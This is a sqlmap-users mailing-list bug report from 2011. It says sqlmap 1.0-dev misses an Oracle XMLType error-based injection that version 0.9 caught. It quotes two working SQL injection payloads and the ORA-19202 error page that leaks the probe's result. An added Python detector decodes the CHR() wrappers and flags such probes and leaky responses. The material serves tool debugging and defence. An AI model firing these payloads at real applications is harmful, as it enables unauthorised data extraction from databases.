[sqlmap-users] i think there may be a bug in "Oracle AND error-based - WHERE or HAVING clause (XMLT
From: CoeTs7 <tm...@ho...> - 2011-12-04 13:29:33
When I test an injectable point, I found sqlmap 0.9 can exploit it while 1.0-dev (r4567) cannot.

1.0-dev first sends

testf') AND 3339=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(105)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (3339=3339) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(120)||CHR(110)||CHR(109)||CHR(58)||CHR(62))) FROM DUAL) AND ('QjCL'='QjCL

to see if the controllable part is in parentheses. The webpage returns a "query Not properly closed" error, so it goes on to send

testf' AND 3339=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(105)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (3339=3339) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(120)||CHR(110)||CHR(109)||CHR(58)||CHR(62))) FROM DUAL) AND 'ZCna'='ZCn

The webpage returns an error page containing

ORA-19202: XML 处理 LPX-00110: Warning: 无效的 QName ":tif:1:xnm:" (不是名称) Error at line 1

When it receives this, sqlmap 0.9 will tell that this is injectable (this is obvious), but sqlmap 1.0 exits and tells me that all parameters appear to be not injectable. I tried to raise risk/level, but that didn't work at all.
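As an added example (not from the original thread and not sqlmap's own code), a small Python detector for the traffic pattern the report describes: it decodes the CHR(n)||CHR(m)... concatenation in a request parameter to recognise the XMLType wrapper, and pulls out the value the server hands back inside the ORA-19202 / LPX-00110 QName warning, which is the error-disclosure a defender would want to alert on and suppress. The event samples, function names and alert format are constructed for this example.

```python
import re

# Constructed sample events: the second probe quoted in the report and the ORA error it produced.
PROBE = ("testf' AND 3339=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(105)||"
         "CHR(102)||CHR(58)||(SELECT (CASE WHEN (3339=3339) THEN 1 ELSE 0 END) FROM DUAL)"
         "||CHR(58)||CHR(120)||CHR(110)||CHR(109)||CHR(58)||CHR(62))) FROM DUAL) AND 'ZCna'='ZCn")
ORA_BODY = ('<html>ORA-19202: XML 处理 LPX-00110: Warning: 无效的 QName ":tif:1:xnm:" '
            '(不是名称) Error at line 1</html>')
EVENTS = [("testf", "<html>ok</html>"),   # benign request/response pair (constructed)
          (PROBE, ORA_BODY)]              # probe paired with the leaking error page

CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.I)
CHR_ONE = re.compile(r"CHR\((\d+)\)", re.I)
# ORA-19202 wrapping an LPX-00110 QName warning; the QName is where the probe's value surfaces.
ORA_QNAME = re.compile(r'ORA-19202.*?LPX-00110.*?QName\s*"([^"]*)"', re.S)


def decode_chr_runs(sql: str) -> str:
    """Rewrite every CHR(60)||CHR(58)||... run as the literal text it builds."""
    return CHR_RUN.sub(
        lambda m: "".join(chr(int(c)) for c in CHR_ONE.findall(m.group(0))), sql)


def flag_request(value: str) -> dict:
    """XMLType(...) fed a CHR-built '<:...:>' wrapper is the shape of this probe."""
    decoded = decode_chr_runs(value)
    probe = "XMLTYPE(" in decoded.upper() and "<:" in decoded and ":>" in decoded
    return {"xmltype_probe": probe, "decoded": decoded}


def flag_response(body: str):
    """Return the value leaked inside the LPX-00110 QName, or None if no such error."""
    m = ORA_QNAME.search(body)
    if not m:
        return None
    qname = m.group(1).strip(":")            # ":tif:1:xnm:" -> "tif:1:xnm"
    parts = qname.split(":")
    leaked = parts[1] if len(parts) == 3 else qname
    return {"qname": m.group(1), "leaked": leaked}


def scan(events):
    """Alert when a probe-shaped request pairs with a leaking ORA-19202 response."""
    alerts = []
    for value, body in events:
        req, resp = flag_request(value), flag_response(body)
        if req["xmltype_probe"] and resp is not None:
            alerts.append({"leaked": resp["leaked"], "decoded": req["decoded"]})
    return alerts
```

Run over real access and application logs, the response-side check alone is worth an alert: an application that returns raw ORA-/LPX- diagnostics to the client is what turns this probe into a working oracle, and a generic error page removes it.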